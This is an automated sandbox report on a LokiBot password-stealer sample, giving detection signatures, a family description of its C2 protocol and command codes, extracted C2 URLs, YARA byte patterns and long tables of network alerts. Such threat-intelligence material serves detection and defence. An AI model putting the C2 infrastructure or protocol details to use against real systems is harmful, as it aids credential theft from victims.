Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Remittance_CT022024.exe

Overview

General Information

Sample name:Remittance_CT022024.exe
Analysis ID:1620063
MD5:6ba300b78a4f898b931cb4889ce9c461
SHA1:198207a44362b3e7cd1065973c0047619753ac99
SHA256:0db0c831bf2a05700a58dbef8e3ef35af21b6a6dd4de42fa68dfbc608aaf2d5a
Tags:exeuser-threatcat_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Lokibot
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Remittance_CT022024.exe (PID: 5780 cmdline: "C:\Users\user\Desktop\Remittance_CT022024.exe" MD5: 6BA300B78A4F898B931CB4889CE9C461)
    • svchost.exe (PID: 1440 cmdline: "C:\Users\user\Desktop\Remittance_CT022024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 19 entries
          SourceRuleDescriptionAuthorStrings
          0.2.Remittance_CT022024.exe.d40000.1.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.Remittance_CT022024.exe.d40000.1.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            0.2.Remittance_CT022024.exe.d40000.1.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            0.2.Remittance_CT022024.exe.d40000.1.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            0.2.Remittance_CT022024.exe.d40000.1.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 24 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Remittance_CT022024.exe", CommandLine: "C:\Users\user\Desktop\Remittance_CT022024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Remittance_CT022024.exe", ParentImage: C:\Users\user\Desktop\Remittance_CT022024.exe, ParentProcessId: 5780, ParentProcessName: Remittance_CT022024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Remittance_CT022024.exe", ProcessId: 1440, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Remittance_CT022024.exe", CommandLine: "C:\Users\user\Desktop\Remittance_CT022024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Remittance_CT022024.exe", ParentImage: C:\Users\user\Desktop\Remittance_CT022024.exe, ParentProcessId: 5780, ParentProcessName: Remittance_CT022024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Remittance_CT022024.exe", ProcessId: 1440, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-20T16:16:17.139892+010020243121A Network Trojan was detected192.168.2.549704104.21.48.180TCP
            2025-02-20T16:16:18.087669+010020243121A Network Trojan was detected192.168.2.549705104.21.48.180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-20T16:16:16.322309+010020253811Malware Command and Control Activity Detected192.168.2.549704104.21.48.180TCP
            2025-02-20T16:16:17.307331+010020253811Malware Command and Control Activity Detected192.168.2.549705104.21.48.180TCP
            2025-02-20T16:16:18.367474+010020253811Malware Command and Control Activity Detected192.168.2.549706104.21.48.180TCP
            2025-02-20T16:16:19.335336+010020253811Malware Command and Control Activity Detected192.168.2.549707104.21.48.180TCP
            2025-02-20T16:16:20.324351+010020253811Malware Command and Control Activity Detected192.168.2.549708104.21.48.180TCP
            2025-02-20T16:16:21.323819+010020253811Malware Command and Control Activity Detected192.168.2.549709104.21.48.180TCP
            2025-02-20T16:16:22.294705+010020253811Malware Command and Control Activity Detected192.168.2.549710104.21.48.180TCP
            2025-02-20T16:16:23.200838+010020253811Malware Command and Control Activity Detected192.168.2.549711104.21.48.180TCP
            2025-02-20T16:16:24.125311+010020253811Malware Command and Control Activity Detected192.168.2.549712104.21.48.180TCP
            2025-02-20T16:16:25.039521+010020253811Malware Command and Control Activity Detected192.168.2.549713104.21.48.180TCP
            2025-02-20T16:16:25.981651+010020253811Malware Command and Control Activity Detected192.168.2.549714104.21.48.180TCP
            2025-02-20T16:16:26.969517+010020253811Malware Command and Control Activity Detected192.168.2.549715104.21.48.180TCP
            2025-02-20T16:16:28.022554+010020253811Malware Command and Control Activity Detected192.168.2.549716104.21.48.180TCP
            2025-02-20T16:16:28.967798+010020253811Malware Command and Control Activity Detected192.168.2.549717104.21.48.180TCP
            2025-02-20T16:16:29.956089+010020253811Malware Command and Control Activity Detected192.168.2.549720104.21.48.180TCP
            2025-02-20T16:16:30.900670+010020253811Malware Command and Control Activity Detected192.168.2.549722104.21.48.180TCP
            2025-02-20T16:16:31.873987+010020253811Malware Command and Control Activity Detected192.168.2.549733104.21.48.180TCP
            2025-02-20T16:16:32.797871+010020253811Malware Command and Control Activity Detected192.168.2.549741104.21.48.180TCP
            2025-02-20T16:16:33.758158+010020253811Malware Command and Control Activity Detected192.168.2.549747104.21.48.180TCP
            2025-02-20T16:16:34.669656+010020253811Malware Command and Control Activity Detected192.168.2.549753104.21.48.180TCP
            2025-02-20T16:16:35.612325+010020253811Malware Command and Control Activity Detected192.168.2.549759104.21.48.180TCP
            2025-02-20T16:16:36.551922+010020253811Malware Command and Control Activity Detected192.168.2.549764104.21.48.180TCP
            2025-02-20T16:16:37.492477+010020253811Malware Command and Control Activity Detected192.168.2.549771104.21.48.180TCP
            2025-02-20T16:16:38.389144+010020253811Malware Command and Control Activity Detected192.168.2.549777104.21.48.180TCP
            2025-02-20T16:16:39.334739+010020253811Malware Command and Control Activity Detected192.168.2.549784104.21.48.180TCP
            2025-02-20T16:16:40.131753+010020253811Malware Command and Control Activity Detected192.168.2.549790104.21.48.180TCP
            2025-02-20T16:16:40.896407+010020253811Malware Command and Control Activity Detected192.168.2.549796104.21.48.180TCP
            2025-02-20T16:16:41.796338+010020253811Malware Command and Control Activity Detected192.168.2.549802104.21.48.180TCP
            2025-02-20T16:16:42.604162+010020253811Malware Command and Control Activity Detected192.168.2.549808104.21.48.180TCP
            2025-02-20T16:16:43.498058+010020253811Malware Command and Control Activity Detected192.168.2.549816104.21.48.180TCP
            2025-02-20T16:16:44.335802+010020253811Malware Command and Control Activity Detected192.168.2.549823104.21.48.180TCP
            2025-02-20T16:16:45.259021+010020253811Malware Command and Control Activity Detected192.168.2.549829104.21.48.180TCP
            2025-02-20T16:16:46.052711+010020253811Malware Command and Control Activity Detected192.168.2.549835104.21.48.180TCP
            2025-02-20T16:16:47.026184+010020253811Malware Command and Control Activity Detected192.168.2.549840104.21.48.180TCP
            2025-02-20T16:16:48.037442+010020253811Malware Command and Control Activity Detected192.168.2.549848104.21.48.180TCP
            2025-02-20T16:16:48.973042+010020253811Malware Command and Control Activity Detected192.168.2.549856104.21.48.180TCP
            2025-02-20T16:16:50.051457+010020253811Malware Command and Control Activity Detected192.168.2.549863104.21.48.180TCP
            2025-02-20T16:16:51.000609+010020253811Malware Command and Control Activity Detected192.168.2.549869104.21.48.180TCP
            2025-02-20T16:16:51.758357+010020253811Malware Command and Control Activity Detected192.168.2.549875104.21.48.180TCP
            2025-02-20T16:16:52.697953+010020253811Malware Command and Control Activity Detected192.168.2.549884104.21.48.180TCP
            2025-02-20T16:16:54.583144+010020253811Malware Command and Control Activity Detected192.168.2.549896104.21.48.180TCP
            2025-02-20T16:16:55.459859+010020253811Malware Command and Control Activity Detected192.168.2.549902104.21.48.180TCP
            2025-02-20T16:16:56.396860+010020253811Malware Command and Control Activity Detected192.168.2.549909104.21.48.180TCP
            2025-02-20T16:16:57.602808+010020253811Malware Command and Control Activity Detected192.168.2.549919104.21.48.180TCP
            2025-02-20T16:16:58.568401+010020253811Malware Command and Control Activity Detected192.168.2.549925104.21.48.180TCP
            2025-02-20T16:16:59.383755+010020253811Malware Command and Control Activity Detected192.168.2.549932104.21.48.180TCP
            2025-02-20T16:17:00.583736+010020253811Malware Command and Control Activity Detected192.168.2.549940104.21.48.180TCP
            2025-02-20T16:17:01.521989+010020253811Malware Command and Control Activity Detected192.168.2.549948104.21.48.180TCP
            2025-02-20T16:17:02.747718+010020253811Malware Command and Control Activity Detected192.168.2.549956104.21.48.180TCP
            2025-02-20T16:17:03.579100+010020253811Malware Command and Control Activity Detected192.168.2.549962104.21.48.180TCP
            2025-02-20T16:17:04.418454+010020253811Malware Command and Control Activity Detected192.168.2.549969104.21.48.180TCP
            2025-02-20T16:17:05.383888+010020253811Malware Command and Control Activity Detected192.168.2.549975104.21.48.180TCP
            2025-02-20T16:17:06.341337+010020253811Malware Command and Control Activity Detected192.168.2.549983104.21.48.180TCP
            2025-02-20T16:17:07.257546+010020253811Malware Command and Control Activity Detected192.168.2.549990104.21.48.180TCP
            2025-02-20T16:17:08.254281+010020253811Malware Command and Control Activity Detected192.168.2.549998104.21.48.180TCP
            2025-02-20T16:17:09.180238+010020253811Malware Command and Control Activity Detected192.168.2.550005104.21.48.180TCP
            2025-02-20T16:17:10.142553+010020253811Malware Command and Control Activity Detected192.168.2.550011104.21.48.180TCP
            2025-02-20T16:17:11.133529+010020253811Malware Command and Control Activity Detected192.168.2.550020104.21.48.180TCP
            2025-02-20T16:17:11.941724+010020253811Malware Command and Control Activity Detected192.168.2.550025104.21.48.180TCP
            2025-02-20T16:17:12.894688+010020253811Malware Command and Control Activity Detected192.168.2.550032104.21.48.180TCP
            2025-02-20T16:17:13.851657+010020253811Malware Command and Control Activity Detected192.168.2.550034104.21.48.180TCP
            2025-02-20T16:17:15.074419+010020253811Malware Command and Control Activity Detected192.168.2.550035104.21.48.180TCP
            2025-02-20T16:17:16.073887+010020253811Malware Command and Control Activity Detected192.168.2.550036104.21.48.180TCP
            2025-02-20T16:17:17.024522+010020253811Malware Command and Control Activity Detected192.168.2.550037104.21.48.180TCP
            2025-02-20T16:17:17.857847+010020253811Malware Command and Control Activity Detected192.168.2.550038104.21.48.180TCP
            2025-02-20T16:17:18.678223+010020253811Malware Command and Control Activity Detected192.168.2.550039104.21.48.180TCP
            2025-02-20T16:17:19.518205+010020253811Malware Command and Control Activity Detected192.168.2.550040104.21.48.180TCP
            2025-02-20T16:17:20.726809+010020253811Malware Command and Control Activity Detected192.168.2.550041104.21.48.180TCP
            2025-02-20T16:17:21.644405+010020253811Malware Command and Control Activity Detected192.168.2.550042104.21.48.180TCP
            2025-02-20T16:17:22.592381+010020253811Malware Command and Control Activity Detected192.168.2.550043104.21.48.180TCP
            2025-02-20T16:17:23.539726+010020253811Malware Command and Control Activity Detected192.168.2.550044104.21.48.180TCP
            2025-02-20T16:17:24.357576+010020253811Malware Command and Control Activity Detected192.168.2.550045104.21.48.180TCP
            2025-02-20T16:17:25.195454+010020253811Malware Command and Control Activity Detected192.168.2.550046104.21.48.180TCP
            2025-02-20T16:17:26.144422+010020253811Malware Command and Control Activity Detected192.168.2.550047104.21.48.180TCP
            2025-02-20T16:17:27.126923+010020253811Malware Command and Control Activity Detected192.168.2.550048104.21.48.180TCP
            2025-02-20T16:17:28.177373+010020253811Malware Command and Control Activity Detected192.168.2.550049104.21.48.180TCP
            2025-02-20T16:17:29.043382+010020253811Malware Command and Control Activity Detected192.168.2.550050104.21.48.180TCP
            2025-02-20T16:17:30.032338+010020253811Malware Command and Control Activity Detected192.168.2.550051104.21.48.180TCP
            2025-02-20T16:17:30.923035+010020253811Malware Command and Control Activity Detected192.168.2.550052104.21.48.180TCP
            2025-02-20T16:17:32.024601+010020253811Malware Command and Control Activity Detected192.168.2.550053104.21.48.180TCP
            2025-02-20T16:17:32.950587+010020253811Malware Command and Control Activity Detected192.168.2.550054104.21.48.180TCP
            2025-02-20T16:17:33.944204+010020253811Malware Command and Control Activity Detected192.168.2.550055104.21.48.180TCP
            2025-02-20T16:17:34.925143+010020253811Malware Command and Control Activity Detected192.168.2.550056104.21.48.180TCP
            2025-02-20T16:17:35.739092+010020253811Malware Command and Control Activity Detected192.168.2.550057104.21.48.180TCP
            2025-02-20T16:17:36.711985+010020253811Malware Command and Control Activity Detected192.168.2.550058104.21.48.180TCP
            2025-02-20T16:17:37.679673+010020253811Malware Command and Control Activity Detected192.168.2.550059104.21.48.180TCP
            2025-02-20T16:17:38.635771+010020253811Malware Command and Control Activity Detected192.168.2.550060104.21.48.180TCP
            2025-02-20T16:17:39.646426+010020253811Malware Command and Control Activity Detected192.168.2.550061104.21.48.180TCP
            2025-02-20T16:17:40.622099+010020253811Malware Command and Control Activity Detected192.168.2.550062104.21.48.180TCP
            2025-02-20T16:17:41.551088+010020253811Malware Command and Control Activity Detected192.168.2.550063104.21.48.180TCP
            2025-02-20T16:17:42.520135+010020253811Malware Command and Control Activity Detected192.168.2.550064104.21.48.180TCP
            2025-02-20T16:17:43.453546+010020253811Malware Command and Control Activity Detected192.168.2.550065104.21.48.180TCP
            2025-02-20T16:17:44.274483+010020253811Malware Command and Control Activity Detected192.168.2.550066104.21.48.180TCP
            2025-02-20T16:17:45.242709+010020253811Malware Command and Control Activity Detected192.168.2.550067104.21.48.180TCP
            2025-02-20T16:17:46.147396+010020253811Malware Command and Control Activity Detected192.168.2.550068104.21.48.180TCP
            2025-02-20T16:17:47.121340+010020253811Malware Command and Control Activity Detected192.168.2.550069104.21.48.180TCP
            2025-02-20T16:17:47.916673+010020253811Malware Command and Control Activity Detected192.168.2.550070104.21.48.180TCP
            2025-02-20T16:17:48.898986+010020253811Malware Command and Control Activity Detected192.168.2.550071104.21.48.180TCP
            2025-02-20T16:17:49.825519+010020253811Malware Command and Control Activity Detected192.168.2.550072104.21.48.180TCP
            2025-02-20T16:17:50.794615+010020253811Malware Command and Control Activity Detected192.168.2.550073104.21.48.180TCP
            2025-02-20T16:17:51.615187+010020253811Malware Command and Control Activity Detected192.168.2.550074104.21.48.180TCP
            2025-02-20T16:17:52.600140+010020253811Malware Command and Control Activity Detected192.168.2.550075104.21.48.180TCP
            2025-02-20T16:17:53.569529+010020253811Malware Command and Control Activity Detected192.168.2.550076104.21.48.180TCP
            2025-02-20T16:17:54.551208+010020253811Malware Command and Control Activity Detected192.168.2.550077104.21.48.180TCP
            2025-02-20T16:17:55.378087+010020253811Malware Command and Control Activity Detected192.168.2.550078104.21.48.180TCP
            2025-02-20T16:17:56.343098+010020253811Malware Command and Control Activity Detected192.168.2.550079104.21.48.180TCP
            2025-02-20T16:17:57.170825+010020253811Malware Command and Control Activity Detected192.168.2.550080104.21.48.180TCP
            2025-02-20T16:17:58.135758+010020253811Malware Command and Control Activity Detected192.168.2.550081104.21.48.180TCP
            2025-02-20T16:17:58.954650+010020253811Malware Command and Control Activity Detected192.168.2.550082104.21.48.180TCP
            2025-02-20T16:17:59.930325+010020253811Malware Command and Control Activity Detected192.168.2.550083104.21.48.180TCP
            2025-02-20T16:18:00.765832+010020253811Malware Command and Control Activity Detected192.168.2.550084104.21.48.180TCP
            2025-02-20T16:18:01.842155+010020253811Malware Command and Control Activity Detected192.168.2.550085104.21.48.180TCP
            2025-02-20T16:18:02.698380+010020253811Malware Command and Control Activity Detected192.168.2.550086104.21.48.180TCP
            2025-02-20T16:18:03.548403+010020253811Malware Command and Control Activity Detected192.168.2.550087104.21.48.180TCP
            2025-02-20T16:18:04.511337+010020253811Malware Command and Control Activity Detected192.168.2.550088104.21.48.180TCP
            2025-02-20T16:18:05.453021+010020253811Malware Command and Control Activity Detected192.168.2.550089104.21.48.180TCP
            2025-02-20T16:18:06.428189+010020253811Malware Command and Control Activity Detected192.168.2.550090104.21.48.180TCP
            2025-02-20T16:18:07.391494+010020253811Malware Command and Control Activity Detected192.168.2.550091104.21.48.180TCP
            2025-02-20T16:18:08.341451+010020253811Malware Command and Control Activity Detected192.168.2.550092104.21.48.180TCP
            2025-02-20T16:18:09.260283+010020253811Malware Command and Control Activity Detected192.168.2.550093104.21.48.180TCP
            2025-02-20T16:18:10.110310+010020253811Malware Command and Control Activity Detected192.168.2.550094104.21.48.180TCP
            2025-02-20T16:18:10.982207+010020253811Malware Command and Control Activity Detected192.168.2.550095104.21.48.180TCP
            2025-02-20T16:18:11.978903+010020253811Malware Command and Control Activity Detected192.168.2.550096104.21.48.180TCP
            2025-02-20T16:18:12.775197+010020253811Malware Command and Control Activity Detected192.168.2.550097104.21.48.180TCP
            2025-02-20T16:18:13.673870+010020253811Malware Command and Control Activity Detected192.168.2.550098104.21.48.180TCP
            2025-02-20T16:18:14.614710+010020253811Malware Command and Control Activity Detected192.168.2.550099104.21.48.180TCP
            2025-02-20T16:18:15.418259+010020253811Malware Command and Control Activity Detected192.168.2.550100104.21.48.180TCP
            2025-02-20T16:18:16.362183+010020253811Malware Command and Control Activity Detected192.168.2.550101104.21.48.180TCP
            2025-02-20T16:18:17.340457+010020253811Malware Command and Control Activity Detected192.168.2.550102104.21.48.180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-20T16:16:19.182403+010020254831A Network Trojan was detected104.21.48.180192.168.2.549706TCP
            2025-02-20T16:16:20.177402+010020254831A Network Trojan was detected104.21.48.180192.168.2.549707TCP
            2025-02-20T16:16:21.169617+010020254831A Network Trojan was detected104.21.48.180192.168.2.549708TCP
            2025-02-20T16:16:22.138621+010020254831A Network Trojan was detected104.21.48.180192.168.2.549709TCP
            2025-02-20T16:16:23.976249+010020254831A Network Trojan was detected104.21.48.180192.168.2.549711TCP
            2025-02-20T16:16:24.887951+010020254831A Network Trojan was detected104.21.48.180192.168.2.549712TCP
            2025-02-20T16:16:25.829866+010020254831A Network Trojan was detected104.21.48.180192.168.2.549713TCP
            2025-02-20T16:16:26.816096+010020254831A Network Trojan was detected104.21.48.180192.168.2.549714TCP
            2025-02-20T16:16:27.795354+010020254831A Network Trojan was detected104.21.48.180192.168.2.549715TCP
            2025-02-20T16:16:28.821514+010020254831A Network Trojan was detected104.21.48.180192.168.2.549716TCP
            2025-02-20T16:16:29.793028+010020254831A Network Trojan was detected104.21.48.180192.168.2.549717TCP
            2025-02-20T16:16:31.719265+010020254831A Network Trojan was detected104.21.48.180192.168.2.549722TCP
            2025-02-20T16:16:33.593317+010020254831A Network Trojan was detected104.21.48.180192.168.2.549741TCP
            2025-02-20T16:16:34.520499+010020254831A Network Trojan was detected104.21.48.180192.168.2.549747TCP
            2025-02-20T16:16:35.461670+010020254831A Network Trojan was detected104.21.48.180192.168.2.549753TCP
            2025-02-20T16:16:36.394498+010020254831A Network Trojan was detected104.21.48.180192.168.2.549759TCP
            2025-02-20T16:16:37.326112+010020254831A Network Trojan was detected104.21.48.180192.168.2.549764TCP
            2025-02-20T16:16:39.180068+010020254831A Network Trojan was detected104.21.48.180192.168.2.549777TCP
            2025-02-20T16:16:39.986621+010020254831A Network Trojan was detected104.21.48.180192.168.2.549784TCP
            2025-02-20T16:16:40.755807+010020254831A Network Trojan was detected104.21.48.180192.168.2.549790TCP
            2025-02-20T16:16:42.461512+010020254831A Network Trojan was detected104.21.48.180192.168.2.549802TCP
            2025-02-20T16:16:44.166929+010020254831A Network Trojan was detected104.21.48.180192.168.2.549816TCP
            2025-02-20T16:16:45.116954+010020254831A Network Trojan was detected104.21.48.180192.168.2.549823TCP
            2025-02-20T16:16:45.904636+010020254831A Network Trojan was detected104.21.48.180192.168.2.549829TCP
            2025-02-20T16:16:46.872648+010020254831A Network Trojan was detected104.21.48.180192.168.2.549835TCP
            2025-02-20T16:16:48.826626+010020254831A Network Trojan was detected104.21.48.180192.168.2.549848TCP
            2025-02-20T16:16:49.906056+010020254831A Network Trojan was detected104.21.48.180192.168.2.549856TCP
            2025-02-20T16:16:50.834153+010020254831A Network Trojan was detected104.21.48.180192.168.2.549863TCP
            2025-02-20T16:16:51.618680+010020254831A Network Trojan was detected104.21.48.180192.168.2.549869TCP
            2025-02-20T16:16:52.540516+010020254831A Network Trojan was detected104.21.48.180192.168.2.549875TCP
            2025-02-20T16:16:55.288828+010020254831A Network Trojan was detected104.21.48.180192.168.2.549896TCP
            2025-02-20T16:16:57.161044+010020254831A Network Trojan was detected104.21.48.180192.168.2.549909TCP
            2025-02-20T16:16:58.386806+010020254831A Network Trojan was detected104.21.48.180192.168.2.549919TCP
            2025-02-20T16:16:59.204711+010020254831A Network Trojan was detected104.21.48.180192.168.2.549925TCP
            2025-02-20T16:17:00.171449+010020254831A Network Trojan was detected104.21.48.180192.168.2.549932TCP
            2025-02-20T16:17:01.367654+010020254831A Network Trojan was detected104.21.48.180192.168.2.549940TCP
            2025-02-20T16:17:02.530179+010020254831A Network Trojan was detected104.21.48.180192.168.2.549948TCP
            2025-02-20T16:17:03.410351+010020254831A Network Trojan was detected104.21.48.180192.168.2.549956TCP
            2025-02-20T16:17:04.246628+010020254831A Network Trojan was detected104.21.48.180192.168.2.549962TCP
            2025-02-20T16:17:05.203964+010020254831A Network Trojan was detected104.21.48.180192.168.2.549969TCP
            2025-02-20T16:17:06.168198+010020254831A Network Trojan was detected104.21.48.180192.168.2.549975TCP
            2025-02-20T16:17:08.077534+010020254831A Network Trojan was detected104.21.48.180192.168.2.549990TCP
            2025-02-20T16:17:09.963959+010020254831A Network Trojan was detected104.21.48.180192.168.2.550005TCP
            2025-02-20T16:17:11.765443+010020254831A Network Trojan was detected104.21.48.180192.168.2.550020TCP
            2025-02-20T16:17:12.721789+010020254831A Network Trojan was detected104.21.48.180192.168.2.550025TCP
            2025-02-20T16:17:13.691158+010020254831A Network Trojan was detected104.21.48.180192.168.2.550032TCP
            2025-02-20T16:17:15.900297+010020254831A Network Trojan was detected104.21.48.180192.168.2.550035TCP
            2025-02-20T16:17:16.863357+010020254831A Network Trojan was detected104.21.48.180192.168.2.550036TCP
            2025-02-20T16:17:17.657918+010020254831A Network Trojan was detected104.21.48.180192.168.2.550037TCP
            2025-02-20T16:17:18.513532+010020254831A Network Trojan was detected104.21.48.180192.168.2.550038TCP
            2025-02-20T16:17:19.359497+010020254831A Network Trojan was detected104.21.48.180192.168.2.550039TCP
            2025-02-20T16:17:20.217454+010020254831A Network Trojan was detected104.21.48.180192.168.2.550040TCP
            2025-02-20T16:17:21.490292+010020254831A Network Trojan was detected104.21.48.180192.168.2.550041TCP
